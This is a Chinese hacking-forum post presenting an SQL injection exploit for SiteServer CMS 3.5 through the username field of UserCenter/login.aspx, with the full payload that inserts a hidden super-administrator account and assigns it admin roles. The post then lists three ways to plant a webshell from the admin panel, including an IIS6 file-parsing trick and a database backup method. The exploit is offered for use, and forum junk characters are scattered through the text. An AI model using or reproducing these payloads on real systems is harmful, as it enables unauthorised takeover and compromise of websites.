找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2857|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
! k# m% Q' i- |$ P9 H( Nstieserver官网:www.siteserver.cn7 P: X) U0 l( L5 @: c! H
EXP:
, L- W2 o( @8 e: Q% @  ]* l5 i6 c直接访问UserCenter/login.aspx
. r* c. z' |7 R/ L用户名处输入:
% A' _+ B+ y1 J( ?% z; t
' W; F% S- [5 ?4 F! A123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–1 M+ y% U8 \! t9 @  U: ?
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。. [5 M7 @! v4 X) h. z% p( B- F, {. P
之后再访问后台SiteServer/login.aspx用插入的用户登陆2 ?$ y* C9 ^( z2 g5 u' s% R
后台拿webshell的三种方法:0 Y4 t5 f3 {8 f! d7 W6 F
一、4 b- J9 u& |. n
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx* ?9 W0 i$ ~$ `* n1 C
二、  M- f' E( O0 e% L) y) I3 F# n
成员权限-》添加用户-》用户名为:1.asp
1 P, J9 W2 P; e: C( Phttp://127.0.0.1/usercenter/
% I+ E7 f6 l2 `9 E. F& `$ p' U用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell& N! h6 ?0 E6 |+ s' C9 `
(ps:后台添加用户时不会验证是否含有非法字符)
% l0 E1 T$ Y4 {# n- j% {0 A三、
* ?# J- U! s  b( `2 \! j系统工具-》实用工具-》机器参数查看
, A) Y% v3 n+ k9 G可以看到数据库类型、名称,WEB路径
$ f# H  P% z/ W* J  n; O系统工具-》数据库工具-》SQL语句查询& \8 ~: e" J" }0 C" E2 R
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表